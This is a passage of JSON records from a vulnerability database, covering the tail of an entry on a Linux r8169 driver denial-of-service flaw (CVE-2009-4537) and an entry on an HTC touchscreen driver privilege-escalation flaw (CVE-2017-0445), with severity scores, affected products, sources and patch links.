        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1173"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1187"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1437"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-22lenny1_alpha.deb"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41983"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4537"
      },
      {
        "db": "BID",
        "id": "37521"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "db": "PACKETSTORM",
        "id": "89939"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4537"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-41983"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4537"
      },
      {
        "db": "BID",
        "id": "37521"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "db": "PACKETSTORM",
        "id": "89939"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4537"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-01-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-41983"
      },
      {
        "date": "2010-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-4537"
      },
      {
        "date": "2009-12-29T00:00:00",
        "db": "BID",
        "id": "37521"
      },
      {
        "date": "2010-02-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      },
      {
        "date": "2010-05-28T20:14:56",
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "date": "2010-06-04T04:28:39",
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "date": "2009-06-04T14:00:34",
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "date": "2010-06-04T23:01:06",
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "date": "2010-05-26T05:07:56",
        "db": "PACKETSTORM",
        "id": "89939"
      },
      {
        "date": "2009-12-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      },
      {
        "date": "2010-01-12T17:30:00.870000",
        "db": "NVD",
        "id": "CVE-2009-4537"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-11-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-41983"
      },
      {
        "date": "2018-11-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-4537"
      },
      {
        "date": "2015-04-13T22:12:00",
        "db": "BID",
        "id": "37521"
      },
      {
        "date": "2010-04-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      },
      {
        "date": "2010-01-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      },
      {
        "date": "2018-11-16T15:52:37.273000",
        "db": "NVD",
        "id": "CVE-2009-4537"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel of  r8169 Service disruption in drivers  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      }
    ],
    "trust": 0.6
  }
}

var-201702-0760
Vulnerability from variot

An elevation of privilege vulnerability in the HTC touchscreen driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.18. Android ID: A-32769717. GooglePixel & PixelXL is Google's new Android smartphone launched on October 4, 2016, taking over the previous Nexus series. Google Pixel/Pixel XL is prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32769717, A-32917445 and A-32919560

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0760",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 0.8,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "google",
        "version": "\u003c=7.1.1"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0445"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0445"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jianqiang Zhao ( @jianqiangzhao) and pjf of IceSword Lab, Qihoo 360, and Gengjia Chen (@chengjia4574) and pjf of IceSword Lab, Qihoo 360 Technology Co. Ltd.",
    "sources": [
      {
        "db": "BID",
        "id": "96054"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0445",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0445",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-01342",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0445",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0445",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01342",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-290",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0445",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0445"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0445"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the HTC touchscreen driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.18. Android ID: A-32769717. GooglePixel \u0026 PixelXL is Google\u0027s new Android smartphone launched on October 4, 2016, taking over the previous Nexus series. Google Pixel/Pixel XL is prone to multiple privilege-escalation vulnerabilities. \nThese issues are being   tracked by Android Bug IDs A-32769717, A-32917445 and A-32919560",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0445"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0445"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0445",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96054",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-290",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0445",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0445"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0445"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ]
  },
  "id": "VAR-201702-0760",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:29:20.999000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GooglePixel/PixelXLHTC Touchscreen Driver Licensing Vulnerability (CNVD-2017-01342)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89294"
      },
      {
        "title": "Android HTC touchscreen Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67574"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0445"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001494"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-290"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
